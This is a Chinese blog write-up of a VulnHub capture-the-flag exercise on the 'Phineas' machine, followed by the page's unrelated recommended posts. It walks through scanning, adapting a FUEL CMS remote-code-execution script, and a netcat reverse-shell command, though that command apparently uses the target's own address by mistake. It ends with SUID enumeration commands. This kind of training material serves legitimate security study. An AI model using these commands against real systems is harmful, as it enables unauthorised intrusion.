VulnHub打靶记录——phineas

已于 2024-03-04 10:22:36 修改
阅读量484 收藏 8
点赞数 5
分类专栏: 靶场实战 文章标签: 内网渗透
于 2024-03-04 10:20:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43531669/article/details/136210983
版权

靶机下载地址:https://download.vulnhub.com/phineas/Phineas.ova

将靶机设置为NAT模式并启动。

主机发现&信息收集

nmap扫描本地网段

nmap -sn 192.168.17.0/24

在这里插入图片描述
133就是我们的目标靶机。

接着收集靶场信息:

nmap -sV -Pn -O 192.168.17.133

在这里插入图片描述
开放端口22,80,111,3306

直接访问80端口,发现无法访问,dirsearch默认字典也没扫出什么东西,使用 kali 自带的字典跑一下

dirsearch.py -u http://192.168.17.133 -e* -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

只发现 structure 目录,但还是访问不了,继续深度扫描查看 robots.txt文件,说明存在fuel目录
在这里插入图片描述
访问:http://192.168.17.133/structure/fuel/
跳转到:http://192.168.17.133/structure/fuel/start
在这里插入图片描述
再次对 /structure/fuel 进行深度扫描,发现目录
在这里插入图片描述
在此处猜测,有一个系统叫做fuel,只不过现在还没发现入口
在这里插入图片描述
本地搜索一下 fuel,发现是CMS,后面几个SQL 注入需要先登录
在这里插入图片描述
试一下第一个 RCE 脚本
在这里插入图片描述
保存到本地,修改一下脚本:
在这里插入图片描述
更改47138.py文件的 url 和删除代理
在这里插入图片描述
执行一下发现还是不行
在这里插入图片描述
估计是路径不对,把所有 /structure 后都加上 /fuel 看下

在访问 /structure/index.php/fuel/ 路径的时候发现了 fuel cms 登录界面
在这里插入图片描述
再次修改脚本中 URL 路径并执行
在这里插入图片描述
成功执行
在这里插入图片描述

nc反弹shell

目标靶机已安装 NC
在这里插入图片描述
攻击机:

nc -nlvp 4444

cmd:nc 192.168.17.133 4444 -e /bin/bash

用靶机的bash进行操作,把本机的bash推回来
在这里插入图片描述
反弹成功

查看配置文件,看有没有能登录的账号

在这里插入图片描述
开放了22端口,使用ssh链接,输入刚才保存的数据库的密码,发现可以进入
在这里插入图片描述
看有无管理员权限,发现无

sudo -l

sudo -l 列出目前用户可执行与无法执行的指令。

在这里插入图片描述
查找有 suid 属性权限的文件

find / -perm -u=s -type f 2>/dev/null


find / -perm /4000 -type f 2>/dev/null
未完成的歌~
关注
  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub靶场PHINEAS: 1实战记录
aoke79的博客
08-09 1397
vulnhub靶场PHINEAS: 1实战记录
HTB靶场系列 Windows靶机 Slio靶机
m0_57221101的博客
01-27 3300
这台机器涉及到了oracle数据库,之前完全没有涉猎过,借此机会也是熟悉了一下这个数据库的操作方法;以及涉及到了关于内存取证方面的知识,正好上一次在美亚杯只是粗浅的学习了一下取证大师,则此也是借此机会好好的学习了一下取证相关知识 勘探 nmap -sC -sV 10.10.10.82 Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-09 13:15 CST Nmap scan report for 10.10.10.82 Host is up (0
Vulnhub Phineas靶场
一纸荒芜的博客
05-10 1354
Vulnhub Phineas靶场渗透
开题报告宠物医院管理系统的设计与实现 已通过开题答辩的.docx
07-25
随着人们生活水平的提高和精神需求的增加,宠物已经成为很多家庭的重要成员,宠物市场的规模和潜力也不断扩大。宠物医院作为宠物健康保障的重要机构,需要适应市场的发展和变化,提供更加专业和便捷的服务。宠物医院的业务和信息涉及多个方面,如科室信息、医生信息、坐诊信息、药品信息、挂号信息、网站公告信息等。如果采用传统的手工或半自动化的管理方式,会造成信息的分散、混乱、更新困难、查询不便等问题,影响管理的效率和质量。系统能够通过计算机技术和网络技术对宠物医院业务进行集中管理。它可以实现信息的录入、存储、查询、修改、删除、统计、分析、展示等功能,方便宠物医院的管理人员和工作人员进行业务操作和决策支持。宠物医院管理系统还可以利用网络技术,向宠物主人和宠物爱好者提供在线的服务和咨询,方便宠物主人和宠物爱好者了解和关爱自己的宠物,增强宠物医院的社会影响力和竞争力。综上所述,宠物医院管理系统是一个具有实际意义和应用价值的选题,它可以为宠物医院的管理和服务提供有效的支持,为宠物主人和宠物爱好者提供便捷的服务和咨询,为宠物的健康和福利做出贡献。
主成分分析算法Python代码.txt
07-25
数学建模模型python实例。
Linux环境安装Redis 6.2.9
07-25
Linux环境安装Redis 6.2.9
b107校园悬赏任务平台-springboot+vue+elementui.zip(可运行源码+sql文件+文档)
07-25
校园悬赏任务平台对字典管理、论坛管理、任务资讯任务资讯公告管理、接取用户管理、任务管理、任务咨询管理、任务收藏管理、任务评价管理、任务订单管理、发布用户管理、管理员管理等进行集中化处理。经过前面自己查阅的网络知识,加上自己在学校课堂上学习的知识,决定开发系统选择小程序模式这种高效率的模式完成系统功能开发。这种模式让操作员基于浏览器的方式进行网站访问,采用的主流的Java语言这种面向对象的语言进行校园悬赏任务平台程序的开发,在数据库的选择上面,选择功能强大的Mysql数据库进行数据的存放操作。校园悬赏任务平台的开发让用户查看任务信息变得容易,让管理员高效管理任务信息。 校园悬赏任务平台具有管理员角色,用户角色,这几个操作权限。 校园悬赏任务平台针对管理员设置的功能有:添加并管理各种类型信息,管理用户账户信息,管理任务信息,管理任务资讯公告信息等内容。 校园悬赏任务平台针对用户设置的功能有:查看并修改个人信息,查看任务信息,查看任务资讯公告信息等内容。 系统登录功能是程序必不可少的功能,在登录页面必填的数据有两项,一项就是账号,另一项数据就是密码,当管理员正确填写并提交这二者数据之后,管理员就可以进入系统后台功能操作区。项目管理页面提供的功能操作有:查看任务,删除任务操作,新增任务操作,修改任务操作。任务资讯公告信息管理页面提供的功能操作有:新增任务资讯公告,修改任务资讯公告,删除任务资讯公告操作。任务资讯公告类型管理页面显示所有任务资讯公告类型,在此页面既可以让管理员添加新的任务资讯公告信息类型,也能对已有的任务资讯公告类型信息执行编辑更新,失效的任务资讯公告类型信息也能让管理员快速删除。
Matlab实现蚁狮优化算法ALO-TCN-Multihead-Attention多输入单输出回归预测算法研究.rar
07-25
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
openmvection-m笔记
07-25
openmvection-m笔记
无监督领域自适应算法DANN代码
07-25
DANN是一种创新的无监督领域自适应方法,它通过反向传播算法来解决源域和目标域之间的分布差异问题。这种方法在迁移学习领域具有重要的应用价值,尤其是在目标域标签不可用的情况下。 DANN网络核心特点: 无监督学习 - DANN无需目标域的标签信息,即可实现有效的领域自适应。 反向传播 - 利用反向传播算法来更新模型参数,以减少源域和目标域之间的分布差异。 领域判别器 - 引入领域判别器来区分源域和目标域的特征,进一步增强模型的泛化能力。 希望这段介绍能够帮助你更好地展示DANN迁移学习网络的资源,并吸引更多对这一领域感兴趣的学习者和研究者。
(一)SpringCloudAlibaba-环境搭建
07-25
(一)SpringCloudAlibaba-环境搭建
直播营销操作培训课件4:直播活动的实施与执行.pptx
07-25
直播营销操作培训课件4:直播活动的实施与执行.pptx
Docker在Kubernetes中的舞蹈:容器编排的精粹
07-25
Docker是一个开源的应用容器引擎,它允许开发者打包他们的应用以及应用的运行环境到一个可移植的容器中,然后发布到任何流行的Linux机器上,也可以实现虚拟化。容器是完全使用沙箱机制,相互之间不会有任何接口(类似iPhone的app),更重要的是容器性能开销极低。 ### Docker的主要特点包括: 1. **容器化**:Docker可以将应用及其依赖打包在轻量级、可移植的容器中,而不是传统的虚拟机。 2. **可移植性**:由于容器与底层基础设施无关,因此可以在任何安装了Docker的主机上运行。 3. **自动化部署**:Docker可以通过Dockerfile自动化构建容器镜像,简化部署流程。 4. **版本控制和组件重用**:Docker Hub和其他注册中心可以存储容器镜像,支持版本控制和重用。 5. **微服务架构**:Docker非常适合微服务架构,每个服务可以独立打包、部署和扩展。 6. **弹性伸缩**:容器可以快速启动和停止,适合实现应用的弹性伸缩。 7. **安全性**:容器提供了额外的隔离层,有助于提高应用的安全性。 8. **多租户架构**
测试ocx dll com组件
最新发布
07-25
封装的是生成WORD的OCX,用于测试
《Android开发视频教程》第四集:TextView实现跑马灯效果.zip
07-25
《Android开发视频教程》第四集:TextView实现跑马灯效果.zip
Matlab实现能量谷优化算法EVO-TCN-Multihead-Attention多输入单输出回归预测算法研究.rar
07-25
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
Visual Basic的泛型之旅:灵活而强大的类型安全
07-25
Visual Basic(VB)是一种由微软开发的事件驱动的编程语言,它使用BASIC编程语言的语法扩展。Visual Basic最初发布于1991年,设计时考虑了易用性和快速应用开发(RAD)。"Visual"一词指的是它的图形用户界面(GUI)和拖放式编程特性,允许开发者通过可视化的方式设计程序界面,而"Basic"则指其使用的是BASIC语言的语法。 ### Visual Basic的特点: 1. **用户界面设计**:Visual Basic 提供了一个可视化的设计工具,允许开发者通过拖放组件来设计用户界面。 2. **事件驱动编程**:VB 支持事件驱动编程模型,这意味着程序的执行流程是由用户的动作或系统事件触发的。 3. **易于学习**:对于初学者来说,VB 的语法相对简单,易于学习和使用。 4. **集成开发环境(IDE)**:VB 拥有一个功能丰富的IDE,包括代码编辑器、调试工具、项目管理器等。 5. **组件对象模型(COM)**:VB 支持COM,允许开发者创建和使用组件,提高代码的重用性。 6. **数据库访问**:VB 提供了与数据库交互的便捷方式,如使
基于 STM32 的 TOF
07-25
基于 STM32 的 TOF
inator是什么意思
08-07
### 回答1: "Inator"这个后缀通常用于创造具有幽默感或幽默意味的虚构机器或设备的名称。例如,在动画电视节目“Phineas和Ferb”中,角色经常发明具有名称的新小工具,例如“Shrink-inator”或“Time-Travelinator”。后缀的意思是表明该机器或设备具有极高的效率或功率,能够执行特定的任务。 ### 回答2: "Inator"是一个英语创造的后缀,经常用于组合成新词。这个后缀源自于美国动画片《菠萝蜜家庭》中的一个角色,名为Doofenshmirtz。这个角色是个邪恶科学家,他经常给他的发明品加上"Inator"后缀,因此这个后缀就逐渐成为了一个有趣的造词方式。 通常情况下,"Inator"后缀被用于表示一种发明或设备,通常会有一些特定的功能或目的。例如,"冰冻射线器"(Freeze-inator)指的是一种可以冻结物体的装置,"缩小射线器"(Shrink-inator)是一种能缩小物体的装置。这些词汇被广泛运用在动画片、游戏和流行文化中,以营造轻松幽默的氛围。 总而言之,"Inator"是一个用于创造有趣新词的后缀,常用于形容邪恶科学家在动画片《菠萝蜜家庭》中的发明品。它具有一定的幽默性,并被广泛用于流行文化中。 ### 回答3: "Inator"是一个由英语单词"inator"衍生而来的后缀,常用于虚构或模拟新的设备、机器或技术。这个后缀常用于动画、电影、漫画和游戏等媒体中,用于给角色或物体命名,以显示它们具有超越常规能力或功能的想象力。"Inator"通常拥有强大而独特的特性,可能是为了控制、改变或破坏某些事物。在一些动画作品中,主要反派角色常常会拥有一个以"inator"结尾的设备,以增加其威胁和危险性,从而引发故事的冲突和紧张氛围。总之,"inator"在娱乐文化中成为了一个常见的字尾,用于创造具有超强功能和潜力的虚构设备或技术。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值